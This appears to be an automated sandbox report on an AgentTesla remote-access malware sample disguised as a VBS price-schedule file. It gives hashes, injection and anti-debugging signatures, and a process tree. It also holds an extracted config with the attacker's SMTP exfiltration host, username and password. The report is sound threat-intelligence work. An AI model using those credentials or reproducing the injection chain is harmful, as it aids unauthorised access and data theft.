Analysis
  max time kernel: 149s
  max time network: 145s
  platform: windows7_x64
  resource: win7-20240221-en
  resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  submitted: 21/05/2024, 03:42

Static task: static1

Behavioral task: behavioral1
  Sample: RFQINL21052024_PRICE SCHEDULE.vbs
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: RFQINL21052024_PRICE SCHEDULE.vbs
  Resource: win10v2004-20240426-en
General
  Target: RFQINL21052024_PRICE SCHEDULE.vbs
  Size: 5KB
  MD5: ebdb23546bd0e7f4aee2a75909460482
  SHA1: 5e11c38b784b7337fc2cc6ab7100c0240476c7a2
  SHA256: b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293
  SHA512: b16b6573af01d2bd2314c5de1d6dd6e4cbe8080ae0b72fe9180c95f27034e69cef1b1e078162ce7783195f37050d72c9e27940b73203586cc3e1908841faf234
  SSDEEP: 96:QN7IU07Fzr15ZV3J0j9b0xF6Q/0Gb1plVB4CXcZQfp:QFO7hB/pJ0xb2Fn/hpLCCXcKfp
Malware Config
  Extracted: agenttesla
  Protocol: smtp
  Host: mail.connectdots.my
  Port: 587
  Username: [email protected]
  Password: Colony5157!
  Email To: [email protected]
Signatures

AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  5     2620  powershell.exe
  7     2620  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  4     drive.google.com
  5     drive.google.com
  9     drive.google.com

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  13    api.ipify.org
  14    api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid   Process
  2360  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  2384  powershell.exe
  2360  wab.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                          pid   Process         procid_target
  PID 2384 set thread context of 2360  2384  powershell.exe  34

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid   Process
  2620  powershell.exe
  2384  powershell.exe
  2384  powershell.exe
  2360  wab.exe
  2360  wab.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid   Process
  2384  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2620  powershell.exe
  Token: SeDebugPrivilege  2384  powershell.exe
  Token: SeDebugPrivilege  2360  wab.exe

Suspicious use of WriteProcessMemory (20 IoCs; identical rows collapsed, row count in the last column)
  description                       pid   Process         procid_target  rows
  PID 2188 wrote to memory of 2620  2188  WScript.exe     29             3
  PID 2620 wrote to memory of 2408  2620  powershell.exe  31             3
  PID 2620 wrote to memory of 2384  2620  powershell.exe  32             4
  PID 2384 wrote to memory of 2876  2384  powershell.exe  33             4
  PID 2384 wrote to memory of 2360  2384  powershell.exe  34             6
Processes

- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
  Signatures:
  - Suspicious use of WriteProcessMemory
  PID: 2188
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
    Signatures:
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2620

    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
      PID: 2408
    - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted; identical to the script run by the parent powershell.exe]"
      Signatures:
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2384

      - C:\Windows\SysWOW64\cmd.exe (depth 4)
        Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
        PID: 2876

      - C:\Program Files (x86)\windows mail\wab.exe (depth 4)
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        Signatures:
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2360
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 502KB
  MD5: 7f40a091f1c133333e814a35fe64d807
  SHA1: 8d278db73f3e270f33b743f358a9cfa1e3bdbe37
  SHA256: 5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb
  SHA512: d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5P9UP6GMQYW2S58RUTY4.temp
  Filesize: 7KB
  MD5: da50a696b90bbeba959d82bd3d9aeebf
  SHA1: 8a7c678eb0ca20d28afa61bb09dd12b1fe15e676
  SHA256: 8cf890db7e1d04b922e2936a358677408407695cdba5f3d30d649888e5279b3a
  SHA512: f3d52818a1e2e822c088633dbde0d5d27d4c80e109cc773dc371e1210f5f6f73f1259b81d17c34beb1b01a18d743a82824ff23162df60844caf37966a8c745ea